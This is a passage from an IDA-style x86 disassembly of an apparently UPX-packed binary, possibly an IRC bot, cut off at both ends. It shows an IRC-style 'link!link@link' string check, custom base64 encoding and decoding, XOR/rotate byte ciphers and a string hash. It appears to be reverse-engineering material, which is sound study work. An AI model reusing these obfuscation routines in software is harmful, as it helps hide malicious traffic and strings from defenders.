pop ecx
mov eax, [ebp+var_113C]
add eax, [ebp+var_1190]
and byte ptr [eax+1], 0
push 0Dh
lea eax, [ebp+var_1180]
push eax
lea eax, [ebp+var_113C]
push eax
push [ebp+var_1180]
push [ebp+var_113C]
call sub_407928
add esp, 14h
loc_40E7A5: ; CODE XREF: sub_40E618+9D�j
; sub_40E618+AA�j ...
push offset aLinkLink@link ; "link!link@link"
push [ebp+var_1148]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz loc_40E853
and [ebp+var_1194], 0
jmp short loc_40E7D5
; ---------------------------------------------------------------------------
loc_40E7C8: ; CODE XREF: sub_40E618+234�j
mov eax, [ebp+var_1194]
inc eax
mov [ebp+var_1194], eax
loc_40E7D5: ; CODE XREF: sub_40E618+1AE�j
mov eax, [ebp+var_1194]
cmp ds:off_41DB10[eax*4], 0
jnz short loc_40E7E7
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E7E7: ; CODE XREF: sub_40E618+1CB�j
mov eax, [ebp+var_1194]
push ds:off_41DB10[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_1194]
push ds:off_41DB10[eax*4]
mov eax, [ebp+var_1148]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E839
mov eax, [ebp+var_1194]
push ds:off_41DB10[eax*4]
call sub_4105AD
pop ecx
mov [ebp+var_4], 1
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E839: ; CODE XREF: sub_40E618+203�j
mov eax, [ebp+var_1194]
push ds:off_41DB10[eax*4]
call sub_4105AD
pop ecx
jmp loc_40E7C8
; ---------------------------------------------------------------------------
loc_40E851: ; CODE XREF: sub_40E618+1CD�j
; sub_40E618+21F�j
jmp short loc_40E85A
; ---------------------------------------------------------------------------
loc_40E853: ; CODE XREF: sub_40E618+1A1�j
mov [ebp+var_4], 1
loc_40E85A: ; CODE XREF: sub_40E618:loc_40E851�j
and [ebp+var_88], 0
mov [ebp+var_114C], 1
jmp short loc_40E87A
; ---------------------------------------------------------------------------
loc_40E86D: ; CODE XREF: sub_40E618:loc_40E90A�j
mov eax, [ebp+var_114C]
inc eax
mov [ebp+var_114C], eax
loc_40E87A: ; CODE XREF: sub_40E618+253�j
cmp [ebp+var_114C], 80h
jge loc_40E90F
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
cmp eax, 21h
jnz short loc_40E8B6
mov [ebp+var_88], 1
mov eax, [ebp+var_114C]
and byte ptr [ebp+eax+var_88+3], 0
loc_40E8B6: ; CODE XREF: sub_40E618+284�j
cmp [ebp+var_88], 0
jnz short loc_40E8DA
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov byte ptr [ebp+ecx+var_88+3], al
loc_40E8DA: ; CODE XREF: sub_40E618+2A5�j
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov [ebp+ecx+var_1109], al
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E90A
jmp short loc_40E90F
; ---------------------------------------------------------------------------
loc_40E90A: ; CODE XREF: sub_40E618+2EE�j
jmp loc_40E86D
; ---------------------------------------------------------------------------
loc_40E90F: ; CODE XREF: sub_40E618+26C�j
; sub_40E618+2F0�j
and [ebp+var_5], 0
and [ebp+var_1089], 0
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1108]
push eax
lea eax, [ebp+var_84]
push eax
push [ebp+var_4]
call sub_40D871
add esp, 14h
locret_40E941: ; CODE XREF: sub_40E618:loc_40E686�j
leave
retn
sub_40E618 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E943 proc near ; CODE XREF: UPX0:00416ABA�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_40E94E: ; CODE XREF: sub_40E943+32�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E960
jmp short locret_40E977
; ---------------------------------------------------------------------------
loc_40E960: ; CODE XREF: sub_40E943+19�j
push [ebp+var_8]
call sub_407B5E
pop ecx
mov [ebp+var_4], eax
push [ebp+var_8]
call sub_40E618
pop ecx
jmp short loc_40E94E
; ---------------------------------------------------------------------------
locret_40E977: ; CODE XREF: sub_40E943+1B�j
leave
retn
sub_40E943 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E979 proc near ; CODE XREF: UPX0:004168D5�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40E98A
; ---------------------------------------------------------------------------
loc_40E983: ; CODE XREF: sub_40E979+24�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E98A: ; CODE XREF: sub_40E979+8�j
cmp [ebp+var_4], 100h
jnb short loc_40E99F
mov eax, [ebp+var_4]
and ds:byte_41EA80[eax], 0
jmp short loc_40E983
; ---------------------------------------------------------------------------
loc_40E99F: ; CODE XREF: sub_40E979+18�j
and [ebp+var_4], 0
jmp short loc_40E9AC
; ---------------------------------------------------------------------------
loc_40E9A5: ; CODE XREF: sub_40E979+4C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E9AC: ; CODE XREF: sub_40E979+2A�j
cmp [ebp+var_4], 40h
jnb short locret_40E9C7
mov eax, [ebp+var_4]
movzx eax, ds:byte_41A18C[eax]
mov cl, byte ptr [ebp+var_4]
mov ds:byte_41EA80[eax], cl
jmp short loc_40E9A5
; ---------------------------------------------------------------------------
locret_40E9C7: ; CODE XREF: sub_40E979+37�j
leave
retn
sub_40E979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C9 proc near ; CODE XREF: sub_40A9CF+34C�p
; sub_40A9CF+E18�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 2
jnb short loc_40E9E8
xor eax, eax
jmp locret_40EB4C
; ---------------------------------------------------------------------------
loc_40E9E8: ; CODE XREF: sub_40E9C9+16�j
and [ebp+var_4], 0
and [ebp+var_8], 0
loc_40E9F0: ; CODE XREF: sub_40E9C9+17A�j
push 1
pop eax
test eax, eax
jz loc_40EB48
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA29
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
shl eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA2E
; ---------------------------------------------------------------------------
loc_40EA29: ; CODE XREF: sub_40E9C9+40�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA2E: ; CODE XREF: sub_40E9C9+5E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EA66
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
sar eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EA6B
; ---------------------------------------------------------------------------
loc_40EA66: ; CODE XREF: sub_40E9C9+72�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA6B: ; CODE XREF: sub_40E9C9+9B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA99
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
shl eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA9E
; ---------------------------------------------------------------------------
loc_40EA99: ; CODE XREF: sub_40E9C9+B0�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA9E: ; CODE XREF: sub_40E9C9+CE�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EAD6
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EAD8
; ---------------------------------------------------------------------------
loc_40EAD6: ; CODE XREF: sub_40E9C9+E2�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EAD8: ; CODE XREF: sub_40E9C9+10B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EB06
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
shl eax, 6
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EB08
; ---------------------------------------------------------------------------
loc_40EB06: ; CODE XREF: sub_40E9C9+11D�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB08: ; CODE XREF: sub_40E9C9+13B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EB3A
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, ds:byte_41EA80[eax]
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EB3C
; ---------------------------------------------------------------------------
loc_40EB3A: ; CODE XREF: sub_40E9C9+14C�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB3C: ; CODE XREF: sub_40E9C9+16F�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
jmp loc_40E9F0
; ---------------------------------------------------------------------------
loc_40EB48: ; CODE XREF: sub_40E9C9+2C�j
; sub_40E9C9:loc_40EA29�j ...
mov eax, [ebp+var_4]
dec eax
locret_40EB4C: ; CODE XREF: sub_40E9C9+1A�j
leave
retn
sub_40E9C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB4E proc near ; CODE XREF: sub_40A9CF+292�p
; sub_40A9CF+D12�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
loc_40EB60: ; CODE XREF: sub_40EB4E:loc_40EC83�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 4
and eax, 30h
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EBC2
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp loc_40EC88
; ---------------------------------------------------------------------------
loc_40EBC2: ; CODE XREF: sub_40EB4E+52�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 4
and ecx, 0Fh
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 2
and eax, 3Ch
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC2A
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC2A: ; CODE XREF: sub_40EB4E+BD�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 6
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
and eax, 3Fh
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC83
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC83: ; CODE XREF: sub_40EB4E+131�j
jmp loc_40EB60
; ---------------------------------------------------------------------------
loc_40EC88: ; CODE XREF: sub_40EB4E+6F�j
; sub_40EB4E+DA�j ...
mov eax, [ebp+arg_4]
add eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
leave
retn
sub_40EB4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EC96 proc near ; CODE XREF: sub_40A9CF+2FA�p
; sub_40E618+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40ECB4
; ---------------------------------------------------------------------------
loc_40ECAD: ; CODE XREF: sub_40EC96+3A�j
; sub_40EC96+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40ECB4: ; CODE XREF: sub_40EC96+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short loc_40ECE6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
test eax, eax
jz short loc_40ECD2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECD2: ; CODE XREF: sub_40EC96+38�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 41h
jnz short loc_40ECE2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECE2: ; CODE XREF: sub_40EC96+48�j
xor eax, eax
jmp short locret_40ECE9
; ---------------------------------------------------------------------------
loc_40ECE6: ; CODE XREF: sub_40EC96+24�j
push 1
pop eax
locret_40ECE9: ; CODE XREF: sub_40EC96+4E�j
leave
retn
sub_40EC96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECEB proc near ; CODE XREF: UPX0:004168EF�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EB84
call sub_40F26E
pop ecx
pop ecx
lea eax, byte_41EB84
push 10h
pop edx
loc_40ED29: ; CODE XREF: sub_40ECEB+46�j
mov cl, [eax]
rol cl, cl
mov [eax], cl
inc eax
dec edx
jnz short loc_40ED29
pop edi
pop esi
pop ebx
leave
retn
sub_40ECEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED38 proc near ; CODE XREF: sub_40A9CF+14�p
; sub_41113B+159�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
xor ecx, ecx
xor eax, eax
loc_40ED45: ; CODE XREF: sub_40ED38+2F�j
mov cl, [esi]
test ecx, ecx
jz short loc_40ED69
cmp ecx, 61h
jb short loc_40ED53
sub ecx, 20h
loc_40ED53: ; CODE XREF: sub_40ED38+16�j
and ecx, 7Fh
add eax, ecx
and ecx, 0Fh
mov cl, ds:byte_41EB84[ecx]
add eax, ecx
rol eax, 3
inc esi
jmp short loc_40ED45
; ---------------------------------------------------------------------------
loc_40ED69: ; CODE XREF: sub_40ED38+11�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40ED38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED6E proc near ; CODE XREF: UPX0:004168FD�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset dword_41EB98
call sub_40F26E
pop ecx
pop ecx
lea esi, dword_41EB98
mov edi, esi
push 10h
pop ecx
loc_40EDAE: ; CODE XREF: sub_40ED6E+48�j
lodsb
xor al, 0AAh
add al, al
or al, 1
stosb
loop loc_40EDAE
pop edi
pop esi
pop ebx
leave
retn
sub_40ED6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDBD proc near ; CODE XREF: sub_40EF29+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EDCE
; ---------------------------------------------------------------------------
loc_40EDC7: ; CODE XREF: sub_40EDBD+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EDCE: ; CODE XREF: sub_40EDBD+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EE71
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
sub al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EDC7
; ---------------------------------------------------------------------------
locret_40EE71: ; CODE XREF: sub_40EDBD+17�j
leave
retn
sub_40EDBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE73 proc near ; CODE XREF: sub_40EF41+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EE84
; ---------------------------------------------------------------------------
loc_40EE7D: ; CODE XREF: sub_40EE73+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EE84: ; CODE XREF: sub_40EE73+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EF27
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
add al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EE7D
; ---------------------------------------------------------------------------
locret_40EF27: ; CODE XREF: sub_40EE73+17�j
leave
retn
sub_40EE73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF29 proc near ; CODE XREF: sub_40A9CF+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EB98
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EDBD
add esp, 0Ch
pop ebp
retn
sub_40EF29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF41 proc near ; CODE XREF: sub_40A9CF+380�p
; sub_40D871+7AD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EB98
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EE73
add esp, 0Ch
pop ebp
retn
sub_40EF41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF59 proc near ; CODE XREF: sub_40A9CF+271�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
mov eax, [ebp+arg_0]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
call sub_410422
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
and [ebp+var_8], 0
jmp short loc_40EF91
; ---------------------------------------------------------------------------
loc_40EF8A: ; CODE XREF: sub_40EF59+7E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40EF91: ; CODE XREF: sub_40EF59+2F�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40EFD9
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _lrotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EF8A
; ---------------------------------------------------------------------------
loc_40EFD9: ; CODE XREF: sub_40EF59+3E�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40EFE9
; ---------------------------------------------------------------------------
loc_40EFE2: ; CODE XREF: sub_40EF59+D4�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40EFE9: ; CODE XREF: sub_40EF59+87�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F02F
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _lrotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EFE2
; ---------------------------------------------------------------------------
loc_40F02F: ; CODE XREF: sub_40EF59+94�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov [eax-4], ecx
mov eax, [ebp+arg_4]
add eax, 4
leave
retn
sub_40EF59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F040 proc near ; CODE XREF: sub_40A9CF+366�p
; sub_40D871+792�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 4
push eax
push [ebp+arg_0]
call sub_416E02 ; memmove
add esp, 0Ch
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
and [ebp+var_8], 0
jmp short loc_40F07C
; ---------------------------------------------------------------------------
loc_40F075: ; CODE XREF: sub_40F040+82�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40F07C: ; CODE XREF: sub_40F040+33�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40F0C4
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _lrotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F075
; ---------------------------------------------------------------------------
loc_40F0C4: ; CODE XREF: sub_40F040+42�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40F0D4
; ---------------------------------------------------------------------------
loc_40F0CD: ; CODE XREF: sub_40F040+D8�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40F0D4: ; CODE XREF: sub_40F040+8B�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F11A
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _lrotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F0CD
; ---------------------------------------------------------------------------
loc_40F11A: ; CODE XREF: sub_40F040+98�j
